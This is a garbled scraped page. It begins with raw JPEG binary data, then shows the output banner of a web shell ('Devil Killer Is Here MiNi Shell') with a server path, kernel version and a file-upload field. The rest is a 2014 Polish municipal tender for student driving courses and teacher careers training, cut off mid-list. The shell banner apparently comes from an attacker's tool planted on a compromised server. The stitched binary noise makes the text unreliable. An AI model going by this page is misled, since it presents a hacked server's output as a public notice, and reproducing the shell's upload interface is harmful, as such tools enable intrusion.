JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/92809-N-2014.html

<p class="kh_header"><b>Łańcut: ORGANIZACJA I PRZEPROWADZENIE SZKOLEŃ W RAMACH PROJEKTU PODKARPACIE STAWIA NA ZAWODOWCÓW REALIZOWANEGO 
W ZESPOLE SZKÓŁ IM. TADEUSZA KOŚCIUSZKI W WYSOKIEJ</b><br>
<b>Numer ogłoszenia: 92809 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łańcut , ul. Mickiewicza 2a, 37-100 Łańcut, woj. podkarpackie, tel. 017 2252264, faks 017 2256536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminalancut.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA I PRZEPROWADZENIE SZKOLEŃ W RAMACH PROJEKTU PODKARPACIE STAWIA NA ZAWODOWCÓW REALIZOWANEGO 
W ZESPOLE SZKÓŁ IM. TADEUSZA KOŚCIUSZKI W WYSOKIEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Organizacja i przeprowadzenie szkoleń w ramach projektu Podkarpacie stawia na zawodowców realizowanego w Zespole Szkół im. Tadeusza Kościuszki w Wysokiej.
Zamówienie finansowane jest w całości ze środków publicznych. 

Przedmiot zamówienia obejmuje następujące szkolenia/części:
Część 1 - Kurs prawa jazdy kat. B
Część 2 - Doradztwo edukacyjno-zawodowe - szkolenie Rad Pedagogicznych

CZĘŚĆ 1
1. KURS PRAWA JAZDY KAT. B:
1.1 Miejsce przeprowadzenia szkolenia: 
- Zajęcia teoretyczne: Miasto Łańcut. 
- Nauka jazdy: Powiat łańcucki i rzeszowski, w tym miasto Rzeszów.
1.2 Planowana ilość osób: 25 uczennic i uczniów (jedna grupa) Technikum w Zespole Szkół im. T. Kościuszki w Wysokiej. Grupę skompletuje Realizator.
1.3 Termin przeprowadzenia szkolenia: czerwiec - wrzesień 2014 r.
1.4  Kurs powinien być przeprowadzony zgodnie z obowiązującą ustawą o kierujących pojazdami (Dz.U. z 2011 r. Nr 30, poz.151 z późn. zm. oraz aktami wykonawczymi do niniejszej ustawy, w szczególności Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. (Dz.U. z 2012 r. poz. 1019) w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców.  
1.5 Szkolenie kursanta powinno obejmować: 
- 30 godzin zajęć teoretycznych.
- 30 godzin nauki jazdy.

1.6 Godzina zajęć teoretycznych odpowiada 45 minutom. 
1.7 Godzina nauki jazdy odpowiada 60 minutom.
1.8 Zajęcia teoretyczne mogą odbywać się w piątki od godz. 15.30 i/lub soboty od godz. 8.00.
1.9 Nauka jazdy może odbywać się od poniedziałku do piątku w godzinach wolnych od zajęć szkolnych oraz w soboty, a po uzgodnieniu z uczestniczką/uczestnikiem kursu również w niedziele.
1.10 Wykonawca zobowiązany jest do:
- Przeprowadzenia niezbędnych badań lekarskich przed rozpoczęciem kursu 
- Ubezpieczenia NNW uczestniczek i uczestników kursu oraz dostarczenia Zamawiającemu kopii potwierdzającej zawarcie umowy NNW
- Zapewnienia odpowiedniego miejsca i warunków oraz pojazdów do przeprowadzenia szkolenia
- Oznakowania miejsca szkolenia teoretycznego logotypami Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego, nazwą projektu wraz z  zapisem o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
- Przekazania każdemu uczestnikowi materiałów szkoleniowych zaopatrzonych
w logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego, nazwę projektu oraz zapis 
o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
- Zgłoszenia uczestników na egzamin państwowy i poinformowanie Zamawiającego o jego terminie.

1.11 Wykonawca ponosi wszystkie koszty związane z realizacją przedmiotu zamówienia tj.
- Koszty materiałów szkoleniowych, w tym podręcznika, płyt CD, testów próbnych
- Koszty wynajmu sali wykładowej
- Koszty wynajmu placu manewrowego
- Koszty egzaminu wewnętrznego teoretycznego i praktycznego 
- Koszty pierwszego egzaminu teoretycznego i praktycznego w Wojewódzkim Ośrodku Ruchu Drogowego
- Koszty niezbędnych badań lekarskich dla osób rozpoczynających kurs 
- Koszty ubezpieczenia NNW uczestniczki/uczestnika kursu
 
1.12 Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości zajęć, uwzględniając zapisy SIWZ.
1.13 Realizator zastrzega sobie prawo do ustalenia harmonogramu zajęć, do którego Wykonawca nie będzie wnosił żadnych zastrzeżeń.
1.14 Po zakończeniu zajęć Wykonawca wyda uczestnikom zajęć zaświadczenie potwierdzające zdanie wewnętrznego egzaminu teoretycznego i praktycznego    posiadające logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego oraz zapis o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego dostarczone przez Zamawiającego.
1.15 Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu.
1.16 Realizator zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia beneficjentów na każdym jego etapie. 
1.17 Dokumenty z zajęć, które powinien przedłożyć Wykonawca po zakończeniu kursu:
- Listy obecności uczestników kursu
- Dziennik zajęć
- Protokół odbioru zaświadczeń potwierdzających zdanie egzaminu wewnętrznego.  
- Kserokopie zaświadczeń 
- Ankiety ewaluacyjne kursu
1.18 Realizator zastrzega sobie prawo do wykonania jednorazowej zapłaty wynagrodzenia po wykonaniu całej usługi objętej przedmiotem zamówienia, w terminie do 30 dni od dnia dostarczenia faktury. Realizator nie przewiduje zaliczek na poczet wykonania przedmiotu zamówienia.

CZĘŚĆ 2
2. DORADZTWO EDUKACYJNO-ZAWODOWE - SZKOLENIE RAD PEDAGOGICZNYCH:
2.1. Miejsce przeprowadzenia szkolenia: Zespół Szkół im. T. Kościuszki w Wysokiej 49, 37-100 Łańcut. Wykonawca nie ponosi kosztów wynajęcia sali.
2.2. Planowana ilość osób: do 25 nauczycielek i nauczycieli Zespołu Szkół im.  T. Kościuszki w Wysokiej. Grupę skompletuje Realizator.
2.3. Termin przeprowadzenia szkolenia: pierwszy dzień - czerwiec 2014 r.; drugi dzień - wrzesień 2014 r.
2.4. Szkolenie powinno obejmować 8 godzin (2 x 4 godz.) zajęć o następującej tematyce:
- zadania szkoły w zakresie doradztwa edukacyjno-zawodowego;
- diagnozowanie zapotrzebowania uczniów na informacje edukacyjne i zawodowe oraz na pomoc w planowaniu kształcenia i kariery zawodowej;
- tworzenie wewnątrzszkolnego system doradztwa edukacyjno-zawodowego;
- prowadzenie grupowych zajęć aktywizujących, przygotowujących uczniów do świadomego planowania kariery i podjęcia roli zawodowej.

2.5. Wykonawca zobowiązuje się przeprowadzić 8 godzin szkolenia. Szkolenie może odbywać się w od poniedziałku do czwartku po zakończeniu obowiązkowych zajęć lekcyjnych. 
2.6. Godzina zajęć odpowiada 45 minutom.
2.7. Realizator udostępni nieodpłatnie salę szkoleniową.
2.8. Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości zajęć, uwzględniając zapisy SIWZ.
2.9. Realizator zastrzega sobie prawo do ustalenia harmonogramu zajęć, do którego Wykonawca nie będzie wnosił żadnych zastrzeżeń.
2.10. Po zakończeniu zajęć Wykonawca wyda uczestnikom zajęć zaświadczenie  posiadające logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego oraz zapis o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego dostarczone przez Zamawiającego. Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu.
2.11. Dokumenty z zajęć, które powinien przedłożyć Wykonawca po zakończeniu kursu:
- Listy obecności uczestników kursu
- Dziennik zajęć
- Protokół odbioru zaświadczeń  
- Kserokopie zaświadczeń 
- Ankiety ewaluacyjne szkolenia 

2.12. Realizator zastrzega sobie prawo do wykonania jednorazowej zapłaty wynagrodzenia po wykonaniu całej usługi objętej przedmiotem zamówienia tj. po zdaniu egzaminu wewnętrznego teoretycznego i praktycznego przez wszystkich uczestników szkolenia oraz skierowaniu i wniesieniu opłaty egzaminacyjnej /dla części teoretycznej i części praktycznej) w WORD dla wszystkich uczestników,  w terminie   do 30 dni od dnia dostarczenia faktury. Realizator nie przewiduje zaliczek na poczet wykonania przedmiotu zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające udzielone dotychczasowemu wykonawcy usług w okresie 3 lat od daty udzielenia zamówienia podstawowego, polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania tego warunku Zamawiający wymaga by Wykonawca posiadał wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców prowadzonego przez starostę właściwego ze względu na miejsce wykonywania działalności objętej wpisem zgodnie z art. 28 ustawy o kierujących pojazdami (Dz.U z 2011 r. Nr 30 poz. 151 z późn. zm.)

Na potwierdzenie spełniania tego warunku Zamawiający żąda Oświadczenia z art. 22 ust. 1 Pzp.

Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełniania warunku prowadzona będzie na podstawie załączonego do oferty oświadczenia. /Zał. Nr 1 do Oferty/</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Zamawiający żąda od Wykonawcy wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, jednej usługi odpowiadającej przedmiotowi zamówienia tj. usługi polegającej na przeprowadzeniu kursu prawa jazdy kat. B dla grupy min. 20 osób o wartości nie mniejszej niż 30 000,00 zł brutto.

Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełniania tego warunku prowadzona będzie na podstawie załączonych do oferty dokumentów tj. wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania warunku dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia Zamawiający nie określa szczególnych wymagań w tym zakresie.
Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o  spełnianiu warunków określonych w art. 22 ust. 1. Pzp.

Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełniania warunku prowadzona będzie na podstawie załączonego do oferty oświadczenia /Zał. Nr 1 do Oferty/</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda aby Wykonawca dysponował co najmniej dwoma instruktorami do części praktycznej, z których każdy posiada min. 3-letnią praktykę w szkoleniu kandydatów na kierowców   kat. B. - dla Części 1  oraz
Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda aby Wykonawca dysponował co najmniej jednym doradcą zawodowym, posiadającym min. dwu letnie doświadczenie. - dla Części 2

Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełniania tego warunku prowadzona będzie na podstawie załączonych do oferty dokumentów tj. wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania warunku sytuacji ekonomicznej i finansowej do wykonania zamówienia Zamawiający nie określa szczególnych wymagań w tym zakresie.

Na potwierdzenie spełniania tego warunku Zamawiający żąda Oświadczenia z art. 22 ust. 1 Pzp.

Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełniania warunku prowadzona będzie na podstawie załączonego do oferty oświadczenia. /Zał. Nr 1 do Oferty/</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - Zał. Nr 2 do SIWZ
2) Kosztorys ofertowy - Zał. Nr 7 do Oferty
3) Pełnomocnictwo do występowania w imieniu Wykonawcy i zaciągania w jego imieniu zobowiązań. Musi być załączone w oryginale albo załączone jako kopia pełnomocnictwa uwierzytelniona notarialnie  (jeżeli dotyczy).
4) Wykonawca jest obowiązany wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom (jeżeli dotyczy) - Zał. Nr 6 do Oferty
5) Pisemne zobowiązania innych podmiotów od oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeśli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy Prawo zamówień publicznych strony mogą dokonywać nieistotnych zmian postanowień umowy, a także zastrzegają sobie możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której wybrano Wykonawcę polegającej na zmianie terminu szkoleń (w przypadkach losowych, niezależnych od Wykonawcy) po uzyskaniu zgody Zamawiającego, zmianie osób prowadzących szkolenia pod warunkiem, że nowo wskazane osoby będą posiadały kwalifikacje do prowadzenia szkolenia określone w SIWZ jeżeli wynika to z przyczyn niezależnych od Wykonawcy (np. zdarzenia losowe: choroba, wypadek itp.), zmiany wynagrodzenia w przypadku zmniejszenia ilości usług przez Zamawiającego bez zapłaty dodatkowych kwot oraz jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. 

Warunki dokonywania zmian postanowień umowy: 
1) inicjowanie zmian na wniosek wykonawcy lub zamawiającego,  
2) forma pisemna pod rygorem nieważności w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminalancut.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łańcut ul. Mickiewicza 2 a 37-100 Łańcut pokój 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2014 godzina 09:00, miejsce: Urząd Gminy Łańcut ul. Mickiewicza 2 a 37-100 Łańcut pokój 5 /dziennik podawczy/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ORGANIZACJA I PRZEPROWADZENIE SZKOLEŃ W RAMACH PROJEKTU PODKARPACIE STAWIA NA ZAWODOWCÓW REALIZOWANEGO 
W ZESPOLE SZKÓŁ IM. TADEUSZA KOŚCIUSZKI W WYSOKIEJ 

 Kurs prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. KURS PRAWA JAZDY KAT. B:
1.1 Miejsce przeprowadzenia szkolenia: 
- Zajęcia teoretyczne: Miasto Łańcut. 
- Nauka jazdy: Powiat łańcucki i rzeszowski, w tym miasto Rzeszów.
1.2 Planowana ilość osób: 25 uczennic i uczniów (jedna grupa) Technikum w Zespole Szkół im. T. Kościuszki w Wysokiej. Grupę skompletuje Realizator.
1.3 Termin przeprowadzenia szkolenia: czerwiec - wrzesień 2014 r.
1.4  Kurs powinien być przeprowadzony zgodnie z obowiązującą ustawą o kierujących pojazdami (Dz.U. z 2011 r. Nr 30, poz.151 z późn. zm. oraz aktami wykonawczymi do niniejszej ustawy, w szczególności Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. (Dz.U. z 2012 r. poz. 1019) w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców.  
1.5 Szkolenie kursanta powinno obejmować: 
